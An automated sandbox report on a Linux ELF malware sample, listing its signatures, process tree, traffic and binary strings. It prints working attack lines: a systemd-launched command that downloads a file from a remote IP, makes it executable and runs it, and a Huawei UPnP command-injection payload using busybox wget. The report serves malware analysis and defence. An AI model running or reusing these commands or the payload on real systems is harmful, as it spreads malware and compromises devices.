Linux Analysis Report
5.elf

Overview

General Information

Sample name:5.elf
Analysis ID:1588850
MD5:40d57a51ffba8151bf851940d0ad367e
SHA1:dd2bbf98840d5cfe68e6cdc660c6c25e4de6dbc9
SHA256:c14f6f5a9f774456aef2319034d9e6b57975164e2bdbf9a4bf178737a3e725c3
Tags:elfuser-abuse_ch
Infos:

Detection

Score:56
Range:0 - 100
Whitelisted:false

Signatures

Multi AV Scanner detection for submitted file
Sample deletes itself
Sample tries to kill multiple processes (SIGKILL)
Detected non-DNS traffic on DNS port
Enumerates processes within the "proc" file system
Executes commands using a shell command-line interpreter
Executes the "chmod" command used to modify permissions
Executes the "rm" command used to delete files or directories
Executes the "sleep" command used to delay execution and potentially evade sandboxes
Executes the "systemctl" command used for controlling the systemd system and service manager
Executes the "wget" command typically used for HTTP/S downloading
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Sample has stripped symbol table
Sample listens on a socket
Sample tries to kill a process (SIGKILL)
Sample tries to set the executable flag
Sets full permissions to files and/or directories
Uses the "uname" system call to query kernel version information (possible evasion)
Writes ELF files to disk

Classification

Joe Sandbox version:42.0.0 Malachite
Analysis ID:1588850
Start date and time:2025-01-11 06:17:17 +01:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 6m 48s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:5.elf
Detection:MAL
Classification:mal56.spre.evad.linELF@0/3@2/0
  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
  • VT rate limit hit for: 5.elf
Command:/tmp/5.elf
PID:5423
Exit Code:
Exit Code Info:
Killed:True
Standard Output:

Standard Error:
  • system is lnxubuntu20
  • 5.elf (PID: 5423, Parent: 5347, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/5.elf
    • 5.elf New Fork (PID: 5436, Parent: 5423)
    • sh (PID: 5436, Parent: 5423, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl daemon-reload > /dev/null 2>&1"
      • sh New Fork (PID: 5438, Parent: 5436)
      • systemctl (PID: 5438, Parent: 5436, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl daemon-reload
    • 5.elf New Fork (PID: 5442, Parent: 5423)
    • sh (PID: 5442, Parent: 5423, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl start hello.service > /dev/null 2>&1"
      • sh New Fork (PID: 5444, Parent: 5442)
      • systemctl (PID: 5444, Parent: 5442, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl start hello.service
  • wrapper-2.0 (PID: 5427, Parent: 3147, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libsystray.so 6 12582920 systray "Notification Area" "Area where notification icons appear"
  • wrapper-2.0 (PID: 5428, Parent: 3147, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libstatusnotifier.so 7 12582921 statusnotifier "Status Notifier Plugin" "Provides a panel area for status notifier items (application indicators)"
  • wrapper-2.0 (PID: 5429, Parent: 3147, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libpulseaudio-plugin.so 8 12582922 pulseaudio "PulseAudio Plugin" "Adjust the audio volume of the PulseAudio sound system"
  • wrapper-2.0 (PID: 5430, Parent: 3147, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libxfce4powermanager.so 9 12582923 power-manager-plugin "Power Manager Plugin" "Display the battery levels of your devices and control the brightness of your display"
  • wrapper-2.0 (PID: 5431, Parent: 3147, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libnotification-plugin.so 10 12582924 notification-plugin "Notification Plugin" "Notification plugin for the Xfce panel"
  • wrapper-2.0 (PID: 5432, Parent: 3147, MD5: ac0b8a906f359a8ae102244738682e76) Arguments: /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libactions.so 14 12582925 actions "Action Buttons" "Log out, lock or other system actions"
  • systemd New Fork (PID: 5440, Parent: 5439)
  • snapd-env-generator (PID: 5440, Parent: 5439, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • systemd New Fork (PID: 5445, Parent: 1)
  • bash (PID: 5445, Parent: 1, MD5: 7063c3930affe123baecd3b340f1ad2c) Arguments: /bin/bash -c "sleep 10; rm -rf /tmp/5; wget http://103.136.41.100/5 -O /tmp/5; chmod 777 /tmp/5; /tmp/5 .p1 > /dev/null 2>&1;"
    • bash New Fork (PID: 5453, Parent: 5445)
    • sleep (PID: 5453, Parent: 5445, MD5: fcba58db24e5e3672c4d70a3bb01d7a4) Arguments: sleep 10
    • bash New Fork (PID: 5464, Parent: 5445)
    • rm (PID: 5464, Parent: 5445, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf /tmp/5
    • bash New Fork (PID: 5465, Parent: 5445)
    • wget (PID: 5465, Parent: 5445, MD5: 996940118df7bb2aaa718589d4e95c08) Arguments: wget http://103.136.41.100/5 -O /tmp/5
    • bash New Fork (PID: 5467, Parent: 5445)
    • chmod (PID: 5467, Parent: 5445, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod 777 /tmp/5
    • bash New Fork (PID: 5468, Parent: 5445)
    • 5 (PID: 5468, Parent: 5445, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/5 .p1
  • cleanup
No yara matches
No Suricata rule has matched

AV Detection

Source: 5.elf | ReversingLabs: Detection: 39%
Source: global traffic | TCP traffic: 192.168.2.13:56441 -> 1.1.1.1:53
Source: global traffic | TCP traffic: 192.168.2.13:34549 -> 1.1.1.1:53
Source: /bin/bash (PID: 5465) | Wget executable: /usr/bin/wget -> wget http://103.136.41.100/5 -O /tmp/5
Source: /tmp/5.elf (PID: 5423) | Socket: 127.0.0.1:23476
Source: unknown | TCP traffic detected without corresponding DNS query: 1.1.1.1 (logged 4 times)
Source: unknown | TCP traffic detected without corresponding DNS query: 103.136.41.100 (logged 28 times)
Source: unknown | TCP traffic detected without corresponding DNS query: 1.1.1.1 (logged 4 times)
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (logged 2 times)
Source: global traffic | HTTP traffic detected:
  GET /5 HTTP/1.1
  User-Agent: Wget/1.20.3 (linux-gnu)
  Accept: */*
  Accept-Encoding: identity
  Host: 103.136.41.100
  Connection: Keep-Alive
Source: global traffic | DNS traffic detected: DNS query: daisy.ubuntu.com
Source: 5.42.dr | String found in binary or memory: http://%d.%d.%d.%d/%s
Source: 5.elf, 5.42.dr | String found in binary or memory: http://%d.%d.%d.%d/2;
Source: 5.elf, 5423.1.00007fa550036000.00007fa55003a000.rw-.sdmp, bash, 5468.1.00007f39c4036000.00007f39c403a000.rw-.sdmp, 5, 5468.1.00007f39c4036000.00007f39c403a000.rw-.sdmp | String found in binary or memory: http://1/wget.sh
Source: hello.service.12.dr | String found in binary or memory: http://103.136.41.100/5
Source: 5.elf, 5423.1.00007fa550036000.00007fa55003a000.rw-.sdmp, bash, 5468.1.00007f39c4036000.00007f39c403a000.rw-.sdmp, 5, 5468.1.00007f39c4036000.00007f39c403a000.rw-.sdmp | String found in binary or memory: http://9/curl.sh
Source: 5.42.dr | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: 5.42.dr | String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/

System Summary

Source: /tmp/5.elf (PID: 5423) | SIGKILL sent: pid: 3104, result: successful
Source: /tmp/5.elf (PID: 5423) | SIGKILL sent: pid: 3161, result: successful
Source: /tmp/5.elf (PID: 5423) | SIGKILL sent: pid: 3162, result: successful
Source: /tmp/5.elf (PID: 5423) | SIGKILL sent: pid: 3163, result: successful
Source: /tmp/5.elf (PID: 5423) | SIGKILL sent: pid: 3164, result: successful
Source: /tmp/5.elf (PID: 5423) | SIGKILL sent: pid: 3165, result: successful
Source: /tmp/5.elf (PID: 5423) | SIGKILL sent: pid: 3170, result: successful
Source: /tmp/5.elf (PID: 5423) | SIGKILL sent: pid: 3182, result: successful
Source: /tmp/5.elf (PID: 5423) | SIGKILL sent: pid: 3212, result: successful
Source: /tmp/5.elf (PID: 5423) | SIGKILL sent: pid: 5427, result: successful
Source: /tmp/5.elf (PID: 5423) | SIGKILL sent: pid: 5428, result: successful
Source: /tmp/5.elf (PID: 5423) | SIGKILL sent: pid: 5429, result: successful
Source: /tmp/5.elf (PID: 5423) | SIGKILL sent: pid: 5430, result: successful
Source: /tmp/5.elf (PID: 5423) | SIGKILL sent: pid: 5431, result: successful
Source: /tmp/5.elf (PID: 5423) | SIGKILL sent: pid: 5432, result: successful
Source: Initial sample | String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/*; /bin/busybox wget -g %d.%d.%d.%d -l /tmp/.vs -r /h; /bin/busybox chmod 777 /tmp/.vs; /tmp/.vs; sh /tmp/.vs)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: Initial sample | String containing 'busybox' found: %s%d%s<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/*; /bin/busybox wget -g %d.%d.%d.%d -l /tmp/.vs -r /h; /bin/busybox chmod 777 /tmp/.vs; /tmp/.vs; sh /tmp/.vs)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Source: ELF static info symbol of initial sample | .symtab present: no
Source: classification engine | Classification label: mal56.spre.evad.linELF@0/3@2/0
Source: /tmp/5.elf (PID: 5423) | File opened: /proc/5262/cmdline (logged 5 times)
Source: /tmp/5.elf (PID: 5423) | File opened: /proc/3122/cmdline (logged 5 times)
Source: /tmp/5.elf (PID: 5423) | File opened: /proc/3117/cmdline (logged 5 times)
Source: /tmp/5.elf (PID: 5423) | File opened: /proc/3114/cmdline (logged 5 times)
Source: /tmp/5.elf (PID: 5423) | File opened: /proc/914/cmdline (logged 5 times)
Source: /tmp/5.elf (PID: 5423) | File opened: /proc/917/cmdline (logged 5 times)
Source: /tmp/5.elf (PID: 5423) | File opened: /proc/3134/cmdline (logged 5 times)
Source: /tmp/5.elf (PID: 5423) | File opened: /proc/3375/cmdline (logged 5 times)
Source: /tmp/5.elf (PID: 5423) | File opened: /proc/3132/cmdline (logged 5 times)
Source: /tmp/5.elf (PID: 5423) | File opened: /proc/3095/cmdline (logged 5 times)
Source: /tmp/5.elf (PID: 5423) | File opened: /proc/1866/cmdline (logged 5 times)
Source: /tmp/5.elf (PID: 5423) | File opened: /proc/1745/cmdline (logged 5 times)
Source: /tmp/5.elf (PID: 5423) | File opened: /proc/1/cmdline (logged 5 times)
Source: /tmp/5.elf (PID: 5423) | File opened: /proc/1588/cmdline (logged 5 times)
Source: /tmp/5.elf (PID: 5423) | File opened: /proc/884/cmdline (logged 5 times)
Source: /tmp/5.elf (PID: 5423) | File opened: /proc/1982/cmdline (logged 5 times)
Source: /tmp/5.elf (PID: 5423) | File opened: /proc/765/cmdline (logged 5 times)
Source: /tmp/5.elf (PID: 5423) | File opened: /proc/3246/cmdline (logged 5 times)
Source: /tmp/5.elf (PID: 5423) | File opened: /proc/800/cmdline (logged 5 times)
Source: /tmp/5.elf (PID: 5423) | File opened: /proc/767/cmdline (logged 5 times)
Source: /tmp/5.elf (PID: 5423) | File opened: /proc/5423/status
Source: /tmp/5.elf (PID: 5423) | File opened: /proc/1906/cmdline (logged 5 times)
Source: /tmp/5.elf (PID: 5436) | Shell command executed: sh -c "systemctl daemon-reload > /dev/null 2>&1"
Source: /tmp/5.elf (PID: 5442) | Shell command executed: sh -c "systemctl start hello.service > /dev/null 2>&1"
Source: /usr/lib/systemd/systemd (PID: 5445) | Shell command executed: /bin/bash -c "sleep 10; rm -rf /tmp/5; wget http://103.136.41.100/5 -O /tmp/5; chmod 777 /tmp/5; /tmp/5 .p1 > /dev/null 2>&1;"
Source: /bin/bash (PID: 5467) | Chmod executable: /usr/bin/chmod -> chmod 777 /tmp/5
Source: /bin/bash (PID: 5464) | Rm executable: /usr/bin/rm -> rm -rf /tmp/5
Source: /bin/sh (PID: 5438) | Systemctl executable: /usr/bin/systemctl -> systemctl daemon-reload
Source: /bin/sh (PID: 5444) | Systemctl executable: /usr/bin/systemctl -> systemctl start hello.service
Source: /bin/bash (PID: 5465) | Wget executable: /usr/bin/wget -> wget http://103.136.41.100/5 -O /tmp/5
Source: /usr/bin/chmod (PID: 5467) | File: /tmp/5 (bits: - usr: rwx grp: rwx all: rwx)
Source: /bin/bash (PID: 5467) | Chmod executable with 777: /usr/bin/chmod -> chmod 777 /tmp/5
Source: /usr/bin/wget (PID: 5465) | File written: /tmp/5

Hooking and other Techniques for Hiding and Protection

Source: /usr/bin/rm (PID: 5464) | File: /tmp/5